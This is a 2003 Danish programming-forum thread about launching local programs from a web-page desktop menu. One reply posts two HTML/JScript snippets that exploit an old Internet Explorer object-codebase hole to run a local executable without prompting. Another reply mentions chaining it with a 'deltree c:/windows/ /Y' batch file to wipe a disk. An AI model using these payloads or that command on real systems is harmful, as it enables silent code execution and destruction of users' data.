Avatar billede civic Nybegynder
04. juli 2003 - 11:40 Der er 46 kommentarer og
1 løsning

starte program via webside

Hejsa

Nu er jeg ikke ligefrem verdens mester til at lave HTML, men jeg har fået den idé at give mit skrivebord et bedre look ved at gøre sådan at den er baseret på en webside.

Nu er det så sådan, at jeg har fundet en menu jeg kan lide, og som jeg ville lave om så det passer til mig.

Problemet er at jeg igennem denne her menu, ville have til at starte forskellige programmer, men hvad er "koden" til at jeg kan få det gjort, for når jeg f.eks. skriver:
d:\games\cm4\cm4.exe, så siger den bad url.

Håber denne her sætning kan hjælpe lidt:
<param name="LINK 1-1" value="d:\games\cm4\cm4.exe">
oprindeligt så den sådan ud: <param name="LINK 1-1" value="http://www.Infoseek.com">

Bemærk at det ikke skal være i php el. lign. da jeg ikke kan finde ud af det!
Avatar billede dk_akj Nybegynder
04. juli 2003 - 11:48 #1
Her er noget jeg lavede til Elprebsi for godt et års tid siden.

http://www.eksperten.dk/spm/210554

//akj
Avatar billede tuctoh Nybegynder
04. juli 2003 - 11:51 #2
Avatar billede prebstar Nybegynder
04. juli 2003 - 11:51 #3
Hej!

Det kan du desværre ikke:

------------klip------------

Note: running .exes in html
Forum: Guides to HTML
Re: Question: How do you run "exe" files in html? (Shaun)
Date: 2001, Jun 27
From: Ross Shannon <rosh800@hotmail.com>

You can't 'run' executable files in html, but you can link to .exe files and allow readers to download them. Just write the code <A HREF="file.exe">, and make sure the file is where you type it.

Hope that helps,
Ross
HTMLSource : Online HTML Tutorial

------------klip------------

Venligst, Preben
www.prebstar.dk
Avatar billede tuctoh Nybegynder
04. juli 2003 - 11:51 #4
nåå ja, derudover skal du så sætte din egen computer op til at være et trusted site
Avatar billede prebstar Nybegynder
04. juli 2003 - 11:51 #5
..og dog  :o)
Avatar billede dk_akj Nybegynder
04. juli 2003 - 11:53 #6
tuctoh >> Så får du vel dialogbox'en op med "gem eller kør" ??

prebstar >> Det kan godt lade sig gøre ved at bruge activeX

//akj
Avatar billede tuctoh Nybegynder
04. juli 2003 - 11:55 #7
ja, det gør jeg... den kan vist undgås ved at tilføje din egen computer som en trusted site... har bare ikke kunnet finde hvor :p
Avatar billede dk_akj Nybegynder
04. juli 2003 - 12:09 #8
Jeg tvivler på link løsningen virker (sorry tuchoh)

ActiveX løsningen derimod er jeg sikker på virker. Men selvfølgeligt kun på windows baserede pc'er

//akj
Avatar billede civic Nybegynder
04. juli 2003 - 12:13 #9
ActiveX løsningen hjælper dog ikke for mig, da jeg ingen intentioner har med at sætte mig ind i det.

Så prebstar har nok ret, men nu må jeg først lige se hvad andre kan komme frem til.
Avatar billede dk_akj Nybegynder
04. juli 2003 - 12:32 #10
civic >> Det er den eneste måde du kan få adgang til filsystemet på din pc.

//akj
Avatar billede =maddog= Nybegynder
04. juli 2003 - 13:06 #11
<span id="oSpan" style="display:none;"></span>
<script language="jscript" defer>
    oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/calc.exe"></object>';
</script>

bemærk at du skal kende stien. evt. som script-fri (for at vær helt sikker) med xml:

<span datasrc="#oExec" datafld="exploit" dataformatas="html" style="display:none;"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/calc.exe"></object>
            ]]>
        </exploit>
    </security>
</xml>

Disse virker KUN i IE afaik, og jeg kan ikke tale for om sikkerhedshullet er lappet i visse versioner.
Avatar billede dk_akj Nybegynder
04. juli 2003 - 13:09 #12
Hullet er lappet hvis man bruger windows update.

Grumt hul iøvrig, gav tilladelse til at starte programmer på brugerens pc uden der blev spurgt, det var muligt at slette hele harddisken.....

//akj
Avatar billede =maddog= Nybegynder
04. juli 2003 - 13:18 #13
jeg kunne stadig exekvere, hvis jeg bouncede fra res:// protokollen (der jo kører lokalt) for et par uger siden i XP (hvor jeg løbende får opdateret). Så det må være nyt. Til gengæld er det let selv at gardere sig. I regedit kan man sætte zonerne op under
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
kan man sætte 1004 til værdien 3. Det vil sætte securitymanageren i sving hver gang et <object> bliver genparset (hvis jeg fik rigtig fat i det - det er ren woodoo for mig det her).
Avatar billede dk_akj Nybegynder
04. juli 2003 - 13:21 #14
Maddog >> jeg prøvede lige på w2k sp3 med ie 6.0.28

IE viser ikke noget men Norton kommer med en virusalarm.

//akj
Avatar billede webcreator Nybegynder
04. juli 2003 - 13:23 #15
civic > hej. Jeg har et program, der "omformer" dit skrivebord til en kæmpe browser (således, at menuen start og det hele er skjult. Man kan tilmed beskytte det med password, så det ikke kan lukkes igen :-)

Her kan du så åbne dit website, som fungere som et "nyt operativsystem". Har brugt det på en netcafe..

Du får heller ikke den irriterende "Gem eller kør" boks op. Kunne dette være interessant ? Det er lavet i VB, og fungere fint under WinXP.
Avatar billede =maddog= Nybegynder
04. juli 2003 - 13:24 #16
og ja. det var/er et stort hul. at eksekvere notepad er jo rimelig harmløst, men hvis man fik lagt
deltree c:/windows/ /Y
ind i en bat fil i temporary internet files og kørt den kan man roligt sige fanden er løs i laksegade. desuden har jeg ladet man fortælle at flash kan skrive på harddisken uden forespørgsel, hvilket vil gøre det endnu lettere.

mht. virus-alarm så vil man få den ja. endnu en god grund til at have en sådan installeret. du kører w2k siger du. er du sikker på at stien er rigtig så? jeg tror du skal have en anden sti til calc.exe.
Avatar billede dk_akj Nybegynder
04. juli 2003 - 13:28 #17
Maddog >> right - den ligger jo i winnt.

Er du på msn messenger ?

//akj
Avatar billede =maddog= Nybegynder
04. juli 2003 - 13:37 #18
nej det er jeg ikke. jeg er på ICQ dog. Mit nummer står i min profil.
Avatar billede dk_akj Nybegynder
04. juli 2003 - 13:38 #19
det er der vist nogen der har slettet.... send mig lige en mail på dk_akj@hotmail.com
Avatar billede webcreator Nybegynder
04. juli 2003 - 13:39 #20
Kunne min løsning ikke bruges ?
Avatar billede civic Nybegynder
04. juli 2003 - 15:30 #21
webcreator din løsning kunne godt bruges, men hvordan får jeg fat i programmet, har du msn eller et sted du kan uploade det?
Avatar billede webcreator Nybegynder
04. juli 2003 - 15:36 #22
mail : jimmy@powerzone.dk
Avatar billede webcreator Nybegynder
04. juli 2003 - 15:37 #23
Kontakt mig dér ..
Avatar billede dk_akj Nybegynder
04. juli 2003 - 15:57 #24
Husk at løsningen skal være tilgængelig for alle :-)

//akj
Avatar billede webcreator Nybegynder
04. juli 2003 - 16:00 #25
dk_akj > "løsningen" er sådan set tilgængelig for alle - men det er programmet ikke. Det er et systemet jeg har investeret både penge og tid i, så det bliver ikke frigivet som freeware..
Avatar billede webcreator Nybegynder
04. juli 2003 - 16:00 #26
beklager.
Avatar billede =maddog= Nybegynder
04. juli 2003 - 16:17 #27
Det er sådan set både fair og forståeligt. Hvad dk_akj mener er blot, at på eksperten må der ikke uddeles point for et svar, der ikke er frit tilgængeligt. Det skyldes at mange anvender ekspertens søge-system til at opstøve løsninger. Hvis hver anden løsning blev lavet over mail/ICQ uden samtidig at blive lagt til skue i selve spørgsmålet, vil værdien af denne funktion blive stærkt nedsat.
Avatar billede webcreator Nybegynder
04. juli 2003 - 16:23 #28
Ja, det er jeg naturligvis helt forstående overfor :-)
Men hvis der er andre der er interesseret i programmet, så er de velkommen til at kontakte mig. Jeg har ikke tænkt mig at tage flere tusinde kr. for det :D
Avatar billede =maddog= Nybegynder
04. juli 2003 - 16:32 #29
Goody, og under alle omstændigheder vil en bruger der finder dette spørgsmål og tager sig tid til at læse det igennem finde mit hack.
Jeg har selv ting der er ophavsret på, og dem kan jeg ikke bare ligge ud her. Der er jo et firma, der har betalt cool cash for at få det udviklet, og de kan ikke være tjent med at man bare forærer det bort. Ærgeligt, for man vil jo gerne hjælpe.
Avatar billede webcreator Nybegynder
04. juli 2003 - 16:37 #30
yep, helt enig
Avatar billede webcreator Nybegynder
04. juli 2003 - 16:49 #31
Et lille svar :-)
Avatar billede webcreator Nybegynder
04. juli 2003 - 17:01 #32
Mange tak :)
Avatar billede dk_akj Nybegynder
05. juli 2003 - 10:39 #33
webcreator >> Jeg syntes du skal offentligtgøre ideérne bag dit program her på E.

//akj
Avatar billede webcreator Nybegynder
05. juli 2003 - 11:10 #34
Akj > Ved at oprette et nyt spørgsmål ? Eller hvordan mener du ? Tror ikke der vil blive set venligt på reklame, hvis jeg "bare" ønsker at sælge mit program.
Avatar billede webcreator Nybegynder
05. juli 2003 - 11:10 #35
Eller mener du hvordan systemet er sat sammen ?
Avatar billede dk_akj Nybegynder
06. juli 2003 - 09:20 #36
Du skal sådan set bare skrive det samme i denne tråd som du har svaret civic pr mail.

//akj
Avatar billede webcreator Nybegynder
06. juli 2003 - 09:56 #37
Jeg har ikke givet ham en halv løsning, så der er ikke noget at "arbejde videre" på. Jeg har sendt ham en email med et program, som løser hans problem.

Hvis der skulle være andre interesserede, så kan jeg kontaktes på jimmy@powerzone.dk
Avatar billede dk_akj Nybegynder
06. juli 2003 - 13:12 #38
Du må da gerne sende det til mig :-)

Alternativt lægge det så alle kan downloade det :-)

dk_akj@hotmail.com

//akj
Avatar billede webcreator Nybegynder
06. juli 2003 - 23:10 #39
dk > Det er et program jeg har sat både penge og tid i - så kan ikke give det gratis væk. Beklager. Men du er velkommen til at kontakte mig pr. mail, så finder vi nok ud af noget.

jimmy@powerzone.dk
Avatar billede dk_akj Nybegynder
07. juli 2003 - 08:06 #40
Hmm... men civic kunne godt få det ??

//akj
Avatar billede =maddog= Nybegynder
07. juli 2003 - 08:37 #41
civic har sikkert sluppet en skilling.
det er p.t. i orden at modtage betaling for hjælp på eksperten. med mindre det er blevet lavet om igen på det seneste. jeg kan ikke huske om der skal betales komission til eksperten dog. det bør du faktisk lige undersøge selv webcreator.
Avatar billede dk_akj Nybegynder
07. juli 2003 - 08:43 #42
webcreator >> Du må endeligt ikke tage dette personligt men vi er altså nødt til at følge reglerne.
Tag lige et kig på flg. punkter under reglerne:

2.1.12
2.1.13
2.7
2.8

//akj
Avatar billede webcreator Nybegynder
07. juli 2003 - 10:55 #43
Dk_Akj > Jeg var low in cash (points), så rent undtagelsvis "solgte" jeg en licens til civic for 200 points. Jeg overholder ekspertens regler, tak. Som sagt, alle er velkommen til at få en kopi af mit program mod betaling .. Hvilken betaling er op til mig.
Avatar billede dk_akj Nybegynder
07. juli 2003 - 11:45 #44
Om du overholder 2.1.12 og 2.1.13 er jeg meget i tvivl om.....

Over 'n out
//akj
Avatar billede webcreator Nybegynder
07. juli 2003 - 12:43 #45
2.1.12 er overholdt. Løsning er tilgængelig for alle..

2.1.13 er overholdt. Løsning givet. Jeg havde ikke ligefrem lyst til, at paste hele koden til projektet...

Respekter nu, at jeg ikke vil af med programmet gratis.. Manden fik sin løsning og er yderst tilfreds med den. Alle kan få programmet mod betaling. Ville du gå gratis af med et program, du havde betalt i dyre domme for at få lavet ? Og som du har brugt adskillige mængder tid på as well ?

- Lad os stoppe diskutionen her. Er en anelse træt af den !
Avatar billede dk_akj Nybegynder
07. juli 2003 - 12:53 #46
2.1.12 er overholdt. Løsning er tilgængelig for alle........ som vil betale :-)

Ok, vi stopper her, Vi blier jo nok ikke enige :-)

Følgende er IKKE en anklage:

Grunden til at jeg flueknepper denne sag er at vi jo egntligt ikke har noget bevis (ud over dit og civic's ord) for at der ikke blot er tale om en pointoverførsel....

Over 'n out - igen...
//akj
Avatar billede webcreator Nybegynder
07. juli 2003 - 13:06 #47
Nåå ja - du har helt ret. Der kunne faktisk være tale om en overførelse. Men jeg kan selvfølgelig bevise det ved, at overføre programmet til andre - mod betaling ;-)